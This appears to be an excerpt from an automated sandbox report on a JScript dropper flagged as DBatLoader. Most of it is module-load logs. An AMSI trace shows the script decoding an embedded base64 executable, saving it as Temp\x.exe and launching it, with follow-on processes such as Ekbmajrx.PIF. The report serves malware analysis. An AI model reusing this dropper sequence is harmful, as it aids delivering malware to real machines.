                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: 6732832.jsStatic file information: File size 2619064 > 1048576
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.0000000000979000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.000000000094A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      JScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\1105.js.csv");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:11 o: f:createElement a0:%22t%22");IXMLDOMNode._00000029("t");IXMLDOMNode._00000000();IXMLDOMElement._00000000();ITextStream.WriteLine(" exit:11 o: f:createElement r:");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");IFileSystem3._00000000();ITextStream.WriteLine(" entry:37 o: f:GetSpecialFolder a0:2");IFileSystem3.GetSpecialFolder("2");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:37 o: f:GetSpecialFolder r:C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:54 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:54 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:60 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:60 o: f:Write r:undefined");IFolder.Path();_Stream._00000000();ITextStream.WriteLine(" entry:68 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cx.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\1105.js.csv");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:11 o: f:createElement a0:%22t%22");IXMLDOMNode._00000029("t");IXMLDOMNode._00000000();IXMLDOMElement._00000000();ITextStream.WriteLine(" exit:11 o: f:createElement r:");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");IFileSystem3._00000000();ITextStream.WriteLine(" entry:37 o: f:GetSpecialFolder a0:2");IFileSystem3.GetSpecialFolder("2");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:37 o: f:GetSpecialFolder r:C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:54 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:54 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:60 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:60 o: f:Write r:undefined");IFolder.Path();_Stream._00000000();ITextStream.WriteLine(" entry:68 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cx.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");_Stream._00000000();ITextS
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 3.2.x.exe.23dfc48.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.23dfc48.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,3_2_02903E20
                      Source: 6732832.jsString : entropy: 5.84, length: 2618714, content: "TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgGo to definition
